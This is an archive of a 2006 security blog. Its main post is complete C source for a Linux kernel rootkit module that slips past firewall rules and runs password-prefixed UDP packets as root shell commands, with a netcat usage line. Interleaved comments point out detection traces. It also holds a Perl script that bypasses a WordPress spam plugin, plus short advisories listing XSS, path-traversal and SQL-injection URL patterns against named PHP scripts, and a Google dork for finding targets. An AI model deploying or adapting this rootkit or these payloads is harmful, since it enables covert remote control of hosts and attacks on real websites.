Friday, October 13, 2006

rockprincess rootkit

/*
* rprk 0.1 - a simple rootkit for linux 2.6
*
* this program is designed for educational purposes only;
* you are _not_ allowed to distribute this program.
*
* usage:
* compile the module for you target hosts kernel.
* load the module with the parameters "password" and "listen_port",
* e.g: insmod rprk.ko password=lamo listen_port=5555
* now you can control the target host.
* the rootkit even bypasses linux's netfilter.
* e.g: echo "lamotouch /rp_was_here"|netcat -u target.host.com 5555
* this will execute the command "touch /rp_was_here" on target.host.com.
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * One queued command. Carries the work_struct handed to schedule_work()
 * and the heap copy of the command text that exec_func() passes to
 * /bin/sh. Both allocations are made in execute_command(); nothing in this
 * listing frees them, so every accepted command leaks
 * sizeof(struct exec_work) + 1024 bytes of kernel memory (slab growth is a
 * host-side symptom of this module being driven).
 */
struct exec_work {
struct work_struct work;
char *command;
};

/*
 * Module state. password and clisten_port are filled from the insmod
 * command line by module_param_string() below; listen_port is the parsed
 * numeric port, set once in init(). The password is kept in clear text in
 * kernel memory for the lifetime of the module (a memory image or
 * /proc/kcore read recovers it).
 */
static char password[256];
static char clisten_port[17];
static long listen_port;

/*
 * Workqueue callback: hand the queued command to "/bin/sh -c <command>" via
 * call_usermodehelper(). The helper is spawned from kernel context rather
 * than by any login session, which is the host-side trace to look for: a
 * /bin/sh that descends from no session, with the fixed HOME=/ TERM=linux
 * PATH=... environment below and no controlling terminal.
 *
 * data: the struct exec_work queued by execute_command(). Neither it nor
 * data->command is released here. The final 0 presumably selects
 * "do not wait for the helper" — the return value is not checked either way.
 */
static void exec_func(void *data)
{
struct exec_work *exec_work = data;
/* the command string is the untrusted remainder of the UDP payload */
char *argv[] = { "/bin/sh", "-c", exec_work->command, NULL };
/* static so the environment outlives this frame; the helper is not waited for */
static char *envp[] = { "HOME=/", "TERM=linux",
"PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };

call_usermodehelper("/bin/sh", argv, envp, 0);
}

/*
 * insmod parameters. Both use permission mode 0, i.e. they are not exposed
 * under /sys/module/<name>/parameters/, so the password cannot be read back
 * from sysfs once loaded. The MODULE_PARM_DESC strings (with their trailing
 * "\n") are embedded in the .ko and show up in modinfo output — a simple
 * on-disk signature for this module.
 */
module_param_string(password, password, 256, 0);
MODULE_PARM_DESC(password, " password=secret\n");
module_param_string(listen_port, clisten_port, 17, 0);
MODULE_PARM_DESC(listen_port, " listen_port=6666\n");

/*
 * Queue one shell command for execution in process context.
 *
 * cmd: command text extracted from the packet payload by hook_handle(); it
 *      is copied (strlen(cmd) + 1 bytes into a 1024-byte buffer), so the
 *      caller may free its own buffer afterwards.
 *
 * Returns 0 unconditionally. Neither kmalloc() result is checked, so an
 * allocation failure under memory pressure dereferences NULL from the
 * network receive path — an unexplained oops in the kernel log is one way
 * this module's presence can surface.
 *
 * Called from the netfilter hook (atomic context, hence GFP_ATOMIC); the
 * actual spawn is deferred to a workqueue, presumably because
 * call_usermodehelper() cannot be used from that context. The
 * three-argument INIT_WORK() is the pre-2.6.20 workqueue API. The exec_work
 * and command buffers are never freed (see struct exec_work).
 */
static inline int execute_command(char *cmd)
{
struct exec_work *exec_work;

exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);
exec_work->command = kmalloc(1024 * sizeof(char), GFP_ATOMIC);

INIT_WORK(&exec_work->work, exec_func, exec_work);

strncpy(exec_work->command, cmd, strlen(cmd) + 1);
schedule_work(&exec_work->work);

return 0;
}

/*
 * Netfilter LOCAL_IN hook: the command channel.
 *
 * Every inbound IPv4 packet addressed to this host passes through here
 * before any iptables INPUT rule (see rprk_ops: NF_IP_PRI_FIRST). The hook
 * looks for a UDP datagram to listen_port whose payload starts with the
 * password; the bytes after the password, up to the first '\n', are queued
 * as a shell command. In every case the packet is returned NF_ACCEPT, so
 * the trigger datagram is not consumed: it remains visible to packet
 * capture and continues down the normal UDP input path. Password and
 * command travel in clear text, so a network sensor watching UDP to an
 * otherwise unused port, or host-side capture, sees both. There is no
 * source-address check and no rate limit.
 *
 * The hook signature (struct sk_buff **) and skb->nh.iph are the pre-2.6.22
 * forms; this source does not build against later kernels as written.
 *
 * Returns NF_ACCEPT always.
 */
static unsigned int hook_handle(unsigned int hooknum,
struct sk_buff **skb_p,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff *))
{
struct sk_buff *skb = *skb_p;
struct iphdr *iph = skb->nh.iph;
/* UDP header follows the IP header; ihl is in 32-bit words */
struct udphdr *udph = (struct udphdr *)(skb->data + iph->ihl * 4);
/* payload begins after the fixed 8-byte UDP header */
unsigned int payload_offset = (iph->ihl * 4) + 8;
char *payload = skb->data + payload_offset;
char *sent_passwd, *sent_command;
/* may go negative for a truncated datagram; caught by the < 1 test below */
int i, passwdlen, sent_strlen = skb->len - payload_offset;

if (iph->protocol != IPPROTO_UDP)
goto out;

/* udph is only meaningful once the protocol check has passed */
if(!(ntohs(udph->dest) == listen_port))
goto out;

/* cap at the size of exec_work->command */
if(sent_strlen > 1024)
sent_strlen = 1024;

passwdlen = strlen(password);

/* too short to carry the password; note that an empty password (passwdlen 0)
 * passes this test and the strncmp below for any datagram to the port */
if(sent_strlen < 1 || sent_strlen < passwdlen)
goto out;

/* failure paths fall through the kfree() labels; kfree(NULL) is a no-op */
if(!(sent_passwd = kmalloc(passwdlen * sizeof(char) + 1, GFP_ATOMIC)))
goto out1;

if(!(sent_command = kmalloc((sent_strlen - passwdlen) * sizeof(char) + 1, GFP_ATOMIC)))
goto out0;

/* sent_passwd gets no NUL terminator; the strncmp below is length-bounded */
for (i = 0; i < passwdlen; i++)
sent_passwd[i] = payload[i];
/* copy the command up to the first '\n', which also supplies the NUL; a
 * payload without '\n' leaves sent_command unterminated (kmalloc memory is
 * not zeroed), and execute_command() then strlen()s past the buffer */
for (i = 0 ; i < sent_strlen - passwdlen; i++){
if(payload[i + passwdlen] == '\n'){
sent_command[i] = '\0';
break;
}
sent_command[i] = payload[i + passwdlen];
}

/* plain prefix compare against the clear-text password */
if(strncmp(sent_passwd, password, passwdlen) == 0){
execute_command(sent_command);
}

out0:
kfree(sent_command);
out1:
kfree(sent_passwd);
out:
return NF_ACCEPT;
}

/*
 * Hook registration: IPv4, LOCAL_IN (packets addressed to this host),
 * priority NF_IP_PRI_FIRST so it runs ahead of every other hook at that
 * point, including the filter table's INPUT chain. This is what "bypasses
 * netfilter" in the file header means: a DROP rule for the port never sees
 * the datagram before hook_handle() has acted on it. nf_register_hook()
 * links this struct into the kernel's hook list with .owner = THIS_MODULE,
 * so a tool that enumerates registered netfilter hooks and attributes each
 * to its owning module will show an entry for this one.
 */
static struct nf_hook_ops rprk_ops = {
.hook = hook_handle,
.owner = THIS_MODULE,
.pf = PF_INET,
.hooknum = NF_IP_LOCAL_IN,
.priority = NF_IP_PRI_FIRST
};

/*
 * Module entry: parse listen_port, validate it, register the hook.
 *
 * Returns 0 on success, 1 (not a -errno value) for bad parameters, or the
 * nf_register_hook() error. simple_strtol() with base 0 accepts decimal,
 * 0x-prefixed hex and leading-0 octal.
 *
 * As far as this listing shows, nothing hides the module: it is not removed
 * from the module list and registers nothing but the netfilter hook, so
 * lsmod / /proc/modules list it under its build name and the hook is
 * attributed to it.
 */
static int __init init(void)
{
int err;

listen_port = simple_strtol(clisten_port, NULL, 0);

/* always false: password is an array, so its address is never NULL;
 * an empty password is therefore accepted (see hook_handle) */
if(!password)
return 1;
if(!(listen_port > 0 && listen_port < 65536))
return 1;

err = nf_register_hook(&rprk_ops);
if(err < 0)
return err;

return 0;
}

/*
 * Module exit: unregister the hook. Pending work items are not flushed and
 * the leaked exec_work allocations are not reclaimed.
 */
static void __exit fini(void)
{
nf_unregister_hook(&rprk_ops);
}

/* entry/exit registration; no MODULE_LICENSE, so loading taints the kernel
 * (visible in dmesg and /proc/sys/kernel/tainted) */
module_init(init);
module_exit(fini);

Friday, July 07, 2006

Math Comment Spam Protection Plugin - by-pass

wordpress plugin against spam (@ Michael Woehrer)
-> http://sw-guide.de/wordpress/math-comment-spam-protection-plugin/

easy to bypass: you only need to send $mathuseranswer together with $mathresult, using any valid pair of values.


#!/usr/bin/perl -w
#
# Proof of concept for the bypass described above: the plugin's challenge
# state is carried by two client-submitted fields, mathuseranswer (the
# visitor's answer) and mathresult (apparently a value derived from the
# expected answer — the plugin's own logic is not shown here). Because the
# server only compares the two submitted fields, one pair observed on any
# legitimate comment form can be replayed for every later submission.
# The fix is to keep the expected answer server-side (session, or a
# nonce-bound signed token) instead of trusting the submitted mathresult.
#
# LWP::UserAgent and HTTP::Request::Common are CPAN modules, not core Perl.

use HTTP::Request::Common qw(POST);   # builds the form-encoded POST request
use LWP::UserAgent;                   # sends it
use strict;

# sample pair from the author's test install: the challenge 9+5 has the
# answer 14 and was issued together with this mathresult value
# mathuseranswer 9+5 14
# mathresult 59568733


# comment endpoint of a local test install
my $url = 'http://localhost/wordpress/wp-comments-post.php';

# the fields a normal comment submission carries, plus the replayed
# challenge pair; comment_post_ID selects the post being commented on
my $req = POST $url,
[
comment_post_ID => '3',
author => 'spam',
email => 'more\@spam.com',
comment => 'spammm2',
mathuseranswer => '14',
mathresult => '59568733'
];

# dump the outgoing request so the replayed fields can be compared against
# a capture of a genuine submission
print "HTTP-FullRequest-Header: \n";
print $req->headers->as_string() , "\n";

print "HTTP-FullRequest-Header-Content: \n";
print $req->content() ,"\n";


my $ua = LWP::UserAgent->new();

# send it; on an HTTP error print code and message, otherwise the page body
my $response = $ua->request($req);

if ( $response->is_error() ) {
print "Error-Code : ", $response->code() , "\n";
print "Fehlermeldung: ", $response->message() , "\n";
}
else {
print $response->content() , "\n";
}

Friday, May 05, 2006

(c)2005-Comments-Script - XSS Vulnerability


(c)2005-Comments-Script - XSS Vulnerability
--------------------------------------------------------
Software: (c)2005-Comments-Script
Version:
Type: XSS Vulnerability
Date: Mai 5 20:45:53 CEST 2006
Vendor: Www.Goël.Ch
Page: http://xn--gol-kma.ch
Risc: low

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/kommentar.php?id=[XSS]

solution:
----------------------------
validate $id


notes:
----------------------------
The vendor has been informed.

Dynamic Galerie 1.0 - path traversal + XSS Vulnerability


Dynamic Galerie 1.0 - path traversal + XSS Vulnerability
--------------------------------------------------------
Software: Dynamic Galerie
Version: 1.0
Type: path traversal + XSS Vulnerability
Date: Mai 5 19:45:53 CEST 2006
Vendor: timo braun
Page: http://www.timobraun.de/
Risc: middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?pfad=/tmp/
http://[target]/galerie.php?pfad=/home/

http://[target]/index.php?pfad=[XSS]
http://[target]/galerie.php?id=[XSS]


solution:
----------------------------
validate $pfad, $id


notes:
----------------------------
The vendor has been informed.

Tuesday, May 02, 2006

321soft PhP Gallery 0.9 - directory travel & XSS


321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:
----------------------------
index.php
fix $path

notes:
----------------------------
The vendor has been informed.

PHP Linkliste 1.0b - XSS


PHP Linkliste 1.0b - XSS Vulnerability
--------------------------------------------------------
Software: PHP Linkliste
Version: 1.0b
Type: Cross Site Scripting Vulnerability
Date: Wed Mai 3 00:45:02 CEST 2006
Vendor: php design x
Page: http://www.php-designx.de
Risc: middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/links.php?new_input=[XSS]&new_url=[XSS]&new_name=[XSS]
the content is written to links.dat, which has chmod 777 (see the readme)

solution:
----------------------------
validate all form fields in links.php.

PHPKB Knowledge Base - XSS


http://www.knowledgebase-script.com/demo/search.php?searchkeyword=[XSS]


update:
the vendor has informed me that there is no hole.
i only had a look at the online demo. if you want, you can send me a full version. :)

and sorry guys, i didn't post it to http://secunia.com/

Monday, May 01, 2006

myvideo.de Xss


myvideo.de is a new site for free video hosting.

in all form fields i saw, it was possible to include javascript code.
they use insecure cookies, so it is easy to steal them and log in as another person.

examples:

http://www.myvideo.de/watch/xy (comment-box)
http://www.myvideo.de/online/page.php?P=xy&U_ID=xy (profil)
http://www.myvideo.de/online/page.php?P=xy&volltext=[XSS]&Submit=Suche (search-box)

Monday, April 17, 2006

Linpha - XSS Vulnerabilities


Linpha - XSS Vulnerabilities
--------------------------------------------------------
Software: Linpha
Version: 1.1.0
Type: Cross Site Scripting Vulnerability
Date: Mon Apr 17 22:59:39 CEST 2006
Vendor: The LinPHA developers
Page: http://linpha.sourceforge.net/
Risc: Low

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
Greetz: karambole

vulnerability:
----------------------------
http://[target]/plugins/stats/stats_view.php?date_from=[XSS]
http://[target]/plugins/stats/stats_view.php?date_to=[XSS]
http://[target]/plugins/stats/stats_view.php?date=[XSS]

notes:
----------------------------
The vendor has been informed.

Thursday, April 13, 2006

PowerClan 1.14 - SQL Injection


PowerClan 1.14 - SQL Injection
--------------------------------------------------------
Software: PowerClan 1.14
Version: 1.14
Type: SQL Injection
Date: Apr 13 23:37:50 CEST 2006
Vendor: powerscripts.org
Page: http://www.powerscripts.org
Risc: Middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
magic_quotes_gpc = off
http://[target]/member.php?pcpage=showmember&memberid=[SQL]

solution:
----------------------------
member.php
fix $memberid

notes:
----------------------------
The vendor has been informed.

planetSearch+ - XSS Vulnerabilities


planetSearch+ - XSS Vulnerabilities
--------------------------------------------------------
Software: planetSearch+
Version: 26.10.2005
Type: Cross Site Scripting Vulnerability
Date: Apr 13 20:44:54 CEST 2006
Vendor: PlaNet Concept e.K.
Page: http://www.planetc.de
Risc: Low

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
Greetz: kara & hm

vulnerability:
----------------------------
http://[target]/planetsearchplus.php?search_exp=[XSS]

solution:
----------------------------
planetsearchplus.php
fix $search_exp

notes:
----------------------------
The vendor has been informed.

googledork:
----------------------------
intitle:"planetSearch+"